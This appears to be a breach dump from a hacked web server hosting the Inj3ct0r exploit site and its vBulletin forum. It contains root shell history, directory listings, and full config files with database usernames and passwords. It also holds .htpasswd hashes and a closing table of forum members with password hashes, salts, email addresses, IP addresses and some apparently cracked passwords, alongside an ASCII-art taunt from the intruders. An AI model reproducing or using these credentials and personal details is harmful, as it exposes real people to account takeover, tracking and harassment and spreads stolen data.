apt-get install unrar
apt-get clean
apt-get update
apt-get install unrar
apt-get install urar
apt-get install unrar-free
unrar
unrar --help
unrar --usage
apt-get upgrade
apt-get clean
exit
deluser sbs
cd /home
rm sbs -R
a2dissite sbs-ua.com
cd /etc/apache2
cd si*e
rm sbs-ua.com
apache2 -k restart
ls -al
exit
cd /home
ls -la
exit
cd /etc/apache2
cd si*e
cp chupik.org.ua vdnh.org.ua
cp chupik.org.ua vdnh.org.ua
ls -al
cd ..
nano vhosts
cd si*e
ls -al
nano chupik.org.ua
nano vdnh.org.ua
a2ensite chupik.org.ua
a2ensite vdnh.org.ua
apache2 -k restart
exit

cd scripts
ls -la
total 4
drwxr-xr-x 2 root root 1024 Aug 2 21:39 .
drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
-rwx------ 1 root root 76 Feb 1 2010 clear_cband.sh
-rwx------ 1 root root 220 May 31 00:59 uaix_block.sh
cat *
#!/bin/sh

apache2 -k stop
sleep 5
rm /etc/apache2/cband/*
apache2 -k start
#!/bin/sh

rm prefixes.txt
rm /etc/apache2/cband-ua.conf
wget -q http://www.colocall.net/uaix/prefixes.txt

for i in `cat prefixes.txt`
do
echo "CBandClassDst i" >> /etc/apache2/cband-ua.conf
done

apache2ctl graceful

$ cd ..

$ cd test

$ ls -la
total 2
drwxr-xr-x 2 root root 1024 Oct 15 16:51 .
drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
-rw-r--r-- 1 root root 0 Oct 15 16:34 1d7.JPg
-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_5.jpg
-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_7.JPG
-rw-r--r-- 1 root root 0 Oct 15 16:33 ONE.JPG

$ cd /home

$ ls -la
total 169
drwxr-x--x 37 root root 4096 Oct 20 17:45 .
drwxr-xr-x 22 root root 1024 Oct 3 22:04 ..
-rw------- 1 root root 9216 Oct 22 17:45 aquota.group
-rw------- 1 root root 9216 Oct 22 17:45 aquota.user
drwxr-x--- 7 asmer asmer 4096 Oct 22 18:58 asmer
drwxr-x--- 6 cherrybikes cherrybikes 4096 Oct 24 18:56 cherrybikes
drwxr-x--- 4 chupik chupik 4096 Dec 14 2009 chupik
drwxr-x--- 4 conference-sidelnikov conference-sidelnikov 4096 Jan 7 2010 conference-sidelnikov
drwxr-x--- 4 dyquem dyquem 4096 Sep 6 17:20 dyquem
drwxr-x--- 4 hochumogu hochumogu 4096 Jul 16 16:51 hochumogu
drwxr-x--- 13 jaguar jaguar 4096 Oct 24 10:49 jaguar
drwxr-x--- 4 krivopustov krivopustov 4096 Nov 6 2007 krivopustov
drwxr-x--- 3 lalizas lalizas 4096 Feb 18 2009 lalizas
drwxr-x--- 4 magicgarden magicgarden 4096 Jul 12 23:32 magicgarden
drwxr-x--- 4 mazafaka inj3ct0r 4096 Oct 3 20:33 mazafaka
drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 n3tw0rkTeRr0r15M
drwxr-x--- 4 natasha natasha 4096 Oct 19 2009 natasha
drwxr-x--- 4 nmusic nmusic 4096 Mar 2 2009 nmusic
drwxr-x--- 4 pma pma 4096 May 13 16:28 pma
drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r
drwxr-x--- 4 ra5ta ra5ta 4096 Jul 12 18:25 ra5ta
drwxr-x--- 4 silentwarrior silentwarrior 4096 Oct 4 2009 silentwarrior
drwxr-x--- 4 skyweb skyweb 4096 Apr 16 2010 skyweb
drwxr-x--- 4 snt-nmu snt-nmu 4096 Feb 27 2009 snt-nmu
drwxr-x--- 4 steelnews steelnews 4096 Sep 4 15:20 steelnews
drwxr-x--- 4 sunsanych sunsanych 4096 Jun 13 14:07 sunsanych
drwxr-x--- 4 sweethome sweethome 4096 Aug 16 01:21 sweethome
drwxrwxrwx 2 root root 4096 Oct 24 16:12 temp
drwxr-x--- 4 tiler tiler 4096 Oct 20 22:37 tiler
drwxr-x--- 4 tmv-nmu tmv-nmu 4096 May 6 08:49 tmv-nmu
drwxr-x--- 4 vakulenko vakulenko 4096 Feb 27 2009 vakulenko
drwxr-x--- 4 vika vika 4096 Sep 8 19:15 vika
drwxr-x--- 4 volosovets volosovets 4096 Nov 6 2007 volosovets
drwxr-x--- 4 vonline vonline 4096 Sep 5 22:13 vonline
drwxr-x--- 5 wapper wapper 4096 Jun 13 2009 wapper
drwxr-x--- 4 wateam wateam 4096 Dec 27 2009 wateam
drwxr-x--- 4 web-ghost web-ghost 4096 Jun 7 10:05 web-ghost
drwxr-x--- 4 xanavi xanavi 4096 Jun 9 2009 xanavi
drwxr-x--- 4 yslivka yslivka 4096 Apr 23 2010 yslivka

$ cd r0otech0inj3ct0rr00t0ro0t3r

$ ls -la
total 8048
drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 .
drwxr-x--x 37 root root 4096 Oct 20 17:45 ..
drwxr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Jan 22 2010 cgi-bin
-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 8210510 Oct 24 19:29 error.log
dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 24 19:27 htdocs

$ cd htdocs

$ ls -la
total 184
dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 5 19:21 .
drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 ..
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1821 Oct 5 19:19 .htaccess
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 85 Oct 1 14:17 BingSiteAuth.xml
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4047 Oct 1 14:17 author.php
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 banner
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 13:20 banner_black
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1445 Oct 1 14:17 browser.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2308 Oct 1 14:17 category.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 604 Oct 1 14:17 config.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 date.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 562 Oct 1 14:17 db.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2090 Oct 1 14:17 exploit.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1406 Oct 1 14:17 favicon.ico
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 28 14:15 files
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 53 Oct 1 14:17 googlee6e0c515ab2abd97.html
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 83 Oct 1 14:17 hacker.php
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 02:37 images
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1745 Oct 16 12:34 index.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2672 Oct 8 13:19 inj3ct0r.css
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 9293 Oct 5 19:15 lib.php
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 pages
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1008 Oct 1 14:17 pages.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2873 Oct 1 14:17 platform.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1894 Oct 1 14:17 related.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 131 Oct 1 14:17 robots.txt
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 rss.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2203 Oct 5 19:10 search.php
-rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1739 Oct 1 14:17 sitemap.php
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 27 23:53 sploits
dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 templates
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 261 Oct 1 14:17 y_key_6e34fe98df61c405.html
-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 0 Oct 1 14:17 yandex_76b91b15d528ba00.txt

$ cat config.php
<?

GLOBAL_START = microtime(true);

define("DB_HOST", "localhost");
define("DB_LOGIN", "9r0o7yIn6vD2k9a4");
define("DB_PASSWORD", "=!(_r0ot+e-c-h-0@inj3ct0r_)!=");
define("DB_DATABASE", "9r0o7yIn6vD2k9a4");
define("DB_PREFIX", "inj3ct0r_v2_");

define("BAN_COUNT", 4);

define("EXPLOITS_ON_MAIN", 8);
define("EXPLOITS_ON_PAGE", 30);
define("LINKS_PER_PAGE", 11);

shellcodeCategories = array(1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 21, 22, 23, 24, 27, 28, 29, 30, 32, 33);

mainCategories = array(
34,
26,
20,
6,
7,
"shellcode" => shellcodeCategories,
25
);

redCategory = 34;

?>

$ cd ..
$ cd n3tw0rkTeRr0r15M

$ ls -la
total 20
drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .
drwxr-x--x 37 root root 4096 Oct 20 17:45 ..
-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 96 Aug 12 12:15 .htpasswd
drwxr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22 2010 cgi-bin
drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 htdocs

$ cat .htpasswd
inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/
inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1

$ cd htdocs

$ ls -la
total 2240
drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 .
drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 ..
-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 178 Aug 24 01:59 .htaccess
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24170 Jun 29 15:27 ajax.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75837 Jun 29 15:27 album.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17463 Jun 29 15:27 announcement.php
dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 archive
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18637 Jun 29 15:28 attachment.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75654 Jun 29 15:28 calendar.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 43 Jun 6 14:02 clear.gif
dr-xr-xr-x 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:45 clientscript
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 15264 Jun 29 15:28 converse.php
dr-xr-xr-x 7 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 cpstyles
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 3645 Jun 29 15:28 cron.php
dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 customavatars
dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customgroupicons
dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customprofilepics
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 48083 Jun 29 15:28 editpost.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29811 Jun 29 15:29 external.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10114 Jun 29 15:29 faq.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36347 Jun 29 15:41 forumdisplay.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40159 Jun 29 15:29 global.php
dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 greenfox
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25247 Jun 29 15:29 group_inlinemod.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10850 Jun 29 15:30 groupsubscription.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9375 Jun 29 15:30 image.php
dr-xr-xr-x 5 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:42 images
dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 12288 Jun 6 14:01 includes
-rwxrwxrwx 1 n3tw0rkTeRr0r15M inj3ct0r 19444 Sep 26 12:27 index.php
dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 16:28 infernoshout
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11103 Jun 29 15:30 infernoshout.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 44256 Jun 29 15:30 infraction.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10670 Jun 29 15:31 joinrequests.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11052 Jun 29 15:31 login.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17392 Jun 29 15:31 member.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 16259 Jun 29 15:31 member_inlinemod.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36229 Jun 29 15:31 memberlist.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24194 Jun 29 15:31 misc.php
dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 modcp
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 63652 Jun 29 15:32 moderation.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 7084 Jun 29 15:32 moderator.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 1889 Jun 29 15:32 myip.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18804 Jun 29 15:32 newattachment.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 37429 Jun 29 15:33 newreply.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19239 Jun 29 15:33 newthread.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19932 Jun 29 15:33 online.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8024 Jun 29 15:33 payment_gateway.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12238 Jun 29 15:33 payments.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8217 Jun 29 15:34 picture.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 22368 Jun 29 15:33 picture_inlinemod.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25635 Jun 29 15:34 picturecomment.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27740 Jun 29 15:34 poll.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9840 Jun 29 15:34 posthistory.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 74696 Jun 29 15:34 postings.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6921 Jun 29 15:34 printthread.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 71068 Jun 29 15:34 private.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php
dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 22:02 r00tpan3l123lol
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40079 Jun 29 15:35 register.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6015 Jun 29 15:35 report.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 14047 Jun 29 15:35 reputation.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 21274 Jun 29 15:35 sendmessage.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10337 Jun 29 15:36 showgroups.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12716 Jun 29 15:36 showpost.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 73853 Jun 29 15:36 showthread.php
dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 signaturepics
dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 15:42 smilies
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17014 Jun 29 15:36 spy.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 33204 Jun 29 15:36 subscription.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 13693 Jun 29 15:36 tags.php
dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 22 12:03 tech_blue
dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_dark
dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_white
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9020 Jun 29 15:36 threadrate.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12743 Jun 29 15:36 threadtag.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 34836 Jun 29 15:37 usercp.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19423 Jun 29 15:37 usernote.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29903 Jun 29 15:37 validator.php
-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27705 Jun 29 15:37 visitormessage.php

$ cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.5
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2010 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to |
| MySQL, you will need to email your webhost because we |
| cannot tell you the correct values for the variables |
| in this file. |
\*-------------------------------------------------------*/

// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database will be located.
// Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
// for slave options just append _slave to your preferred database type.
config['Database']['dbtype'] = 'mysql';

// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
config['Database']['dbname'] = 'n3tw0rkTeRr0r15M';

// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
config['Database']['tableprefix'] = '';

// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
config['Database']['technicalemail'] = 'dbmaster@example.com';

// ****** FORCE EMPTY SQL MODE ******
// New versions of MySQL (4.1+) have introduced some behaviors that are
// incompatible with vBulletin. Setting this value to "true" disables those
// behaviors. You only need to modify this value if vBulletin recommends it.
config['Database']['force_sql_mode'] = false;



// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put here, leave the default values.
config['MasterServer']['servername'] = 'localhost';
config['MasterServer']['port'] = 3306;

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
config['MasterServer']['username'] = 'n3tw0rkTeRr0r15M';
config['MasterServer']['password'] = '+)(_3xpl0!t3R_goG)teror15M(_}';

// ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
// This option allows you to turn persistent connections to MySQL on or off.
// The difference in performance is negligible for all but the largest boards.
// If you are unsure what this should be, leave it off. (0 = off; 1 = on)
config['MasterServer']['usepconnect'] = 0;



// ****** SLAVE DATABASE CONFIGURATION ******
// If you have multiple database backends, this is the information for your slave
// server. If you are not 100% sure you need to fill in this information,
// do not change any of the values here.
config['SlaveServer']['servername'] = '';
config['SlaveServer']['port'] = 3306;
config['SlaveServer']['username'] = '';
config['SlaveServer']['password'] = '';
config['SlaveServer']['usepconnect'] = 0;



// ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
// This setting allows you to change the name of the folders that the admin and
// moderator control panels reside in. You may wish to do this for security purposes.
// Please note that if you change the name of the directory here, you will still need
// to manually change the name of the directory on the server.
config['Misc']['admincpdir'] = 'r00tpan3l123lol';
config['Misc']['modcpdir'] = 'modcp';

// Prefix that all vBulletin cookies will have
// Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
config['Misc']['cookieprefix'] = 'bb';

// ******** FULL PATH TO FORUMS DIRECTORY ******
// On a few systems it may be necessary to input the full path to your forums directory
// for vBulletin to function normally. You can ignore this setting unless vBulletin
// tells you to fill this in. Do not include a trailing slash!
// Example Unix:
// config['Misc']['forumpath'] = '/home/users/public_html/forums';
// Example Win32:
// config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
config['Misc']['forumpath'] = '';

// ****** COOKIE SECURITY HASH ******
// This option allows you to encode cookie.
// You may use any latin and/or any other alphanumeric symbols.
// Leave this blank to use the default value.
// Note: if you change this all users will be logout.
config['Misc']['cookie_security_hash'] = '';



// ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
// The users specified here will be allowed to view the admin log in the control panel.
// Users must be specified by *ID number* here. To obtain a user's ID number,
// view their profile via the control panel. If this is a new installation, leave
// the first user created will have a user ID of 1. Seperate each userid with a comma.
config['SpecialUsers']['canviewadminlog'] = '1,237';

// ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
// The users specified here will be allowed to remove ("prune") entries from the admin
// log. See the above entry for more information on the format.
config['SpecialUsers']['canpruneadminlog'] = '1';

// ****** USERS WITH QUERY RUNNING PERMISSIONS ******
// The users specified here will be allowed to run queries from the control panel.
// See the above entries for more information on the format.
// Please note that the ability to run queries is quite powerful. You may wish
// to remove all user IDs from this list for security reasons.
config['SpecialUsers']['canrunqueries'] = '';

// ****** UNDELETABLE / UNALTERABLE USERS ******
// The users specified here will not be deletable or alterable from the control panel by any users.
// To specify more than one user, separate userids with commas.
config['SpecialUsers']['undeletableusers'] = '1';

// ****** SUPER ADMINISTRATORS ******
// The users specified below will have permission to access the administrator permissions
// page, which controls the permissions of other administrators
config['SpecialUsers']['superadministrators'] = '1';

// ****** DATASTORE CACHE CONFIGURATION *****
// Here you can configure different methods for caching datastore items.
// vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
// vB_Datastore_APC - to use APC
// vB_Datastore_XCache - to use XCache
// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// config['Datastore']['class'] = 'vB_Datastore_Filecache';

// ******** DATASTORE PREFIX ******
// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
// than one set of forums installed on your host, you *may* need to use a prefix
// so that they do not try to use the same variable within the cache.
// This works in a similar manner to the database table prefix.
// config['Datastore']['prefix'] = '';

// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
config['Datastore']['class'] = 'vB_Datastore_Memcached';
i = 0;
// First Server
i++;
config['Misc']['memcacheserver'][i] = '127.0.0.1';
config['Misc']['memcacheport'][i] = 11211;
config['Misc']['memcachepersistent'][i] = true;
config['Misc']['memcacheweight'][i] = 1;
config['Misc']['memcachetimeout'][i] = 1;
config['Misc']['memcacheretry_interval'][i] = 15;
*/

// ****** The following options are only needed in special cases ******

// ****** MySQLI OPTIONS *****
// When using MySQL 4.1+, MySQLi should be used to connect to the database.
// If you need to set the default connection charset because your database
// is using a charset other than latin1, you can set the charset here.
// If you don't set the charset to be the same as your database, you
// may receive collation errors. Ignore this setting unless you
// are sure you need to use it.
// config['Mysqli']['charset'] = 'utf8';

// Optionally, PHP can be instructed to set connection parameters by reading from the
// file named in 'ini_file'. Please use a full path to the file.
// Example:
// config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
config['Mysqli']['ini_file'] = '';

// Image Processing Options
// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
config['Misc']['maxwidth'] = 2592;
config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| # CVS: RCSfile - Revision: 28757
|| ####################################################################
\*======================================================================*/


/; ;\
__ \\____//
/{_\_/ `'\____
\___ (o) (o } I AM AN INJ3CT0R
_____________________________/ :--' / CHICK, MOO
,-,'`@@@@@@@@ @@@@@@ \_ `__\
;:( @@@@@@@@@ @@@ \___(o'o)
:: ) @@@@ @@@@@@ ,'@@( `===='
:: : @@@@@: @@@@ `@@@:
:: \ @@@@@: @@@@@@@) ( '@@@'
;; /\ /`, @@@@@@@@@\ :@@@@@)
::/ ) {_----------------: :~`,~~;
;;'`; : ) : / `; ;
;;;; : : ; : ; ; :
`'`' / : : : : : :
)_ \__; ";" :_ ; \_\ `,','
:__\ \ * `,'* \ \ : \ * 8`;'* *
`^' \ :/ `^' `-^-' \v/ : \/ BA



Sid3^effects:661567a4c0a71a50fdcf4b2c550775d4:}uP>ob0J%H?EB_&*9z(q7:v%w)j,yx:shell_c99@yahoo.com:122.164.235.10:
L0rd CrusAd3r:2685fd80293b5b6cf1a2d2f488b2db72:{pmYzcy%QfgFy0ftJ?_>"F|L42vtcK:lord.v5111@gmail.com:59.92.22.151:
Inj3ct0r:170aebb9d6ba17f411e90b931421f703:.Q:eI}"c";[e`?'o6N/al|}RE;-mNU:admin@admin.com::
eidelweiss:cd0c84191f189462696ec6de04a5455b:KNU@c;qRh;j$Qc9Vp+r=:$<Pi/rr]T:g1xsystem@windowslive.com:125.167.199.36:
Sn!pEr.S!Te:c5e3f6e791415b187d3d4e2b3d925f77:H?OV^L*.MS@Q03f9uQ_g]D|@vTE0_v:sniper-site@hotmail.com:188.52.23.241:1111117
SONiC:4470e1dc2c49e82f9fca1a3dfc390b1a:4gJ4eT\Rj|L}O/%6(@,&05#:ofzi}#:sonicdefence@gmail.com:115.242.246.84:
Napst3r:d73666e5df3d0eb8a714d5a82178e5d7:#}bjIPUanj,[v2yiQVg~oZhv&<g;`k:n4pst3rr@ymail.com:94.183.216.10:3124741
Th3 RDX:b76091a46d7539eacf00cb149f12f963:0;a?QrF0KSHPX"t_q\?.[N&(@mK|K[:th3rdx@gmail.com:78.107.237.16:
agix:81c472aa99efd24319045f02d5f16be6:e_AcAV4sgTlR6rPEk)-&aexwXLqGpo:flogaultier@hotmail.com:82.228.79.212:laconte
gunslinger_:1b804cc6bf8cbd19c7276d694cf538a6:N_}fYU<sB676{aGTg([1*`p<$yztnG:yudha.gunslinger@gmail.com:182.0.91.89:
indoushka:3d277315b290351a56ec18e4aee1a988:VZIKmamSDtKwy&KnJU)uT`viut}c,$:indoushka@hotmail.com:41.107.107.238:123456789
SeeMe:f3dfe545ae017c7fcb8c7df9884255f1:s~.$o798QL'>}mFtE1ZHRD(LW/Uvhj:jimsalimg@msn.com:41.252.59.225:
KnocKout:64f26f1e22bba61290603bc8f514a56d:`gXoY<&>G~m02Z)EMJK{*oRa\>8aAr:mmertocan@gmail.com:88.242.249.163:
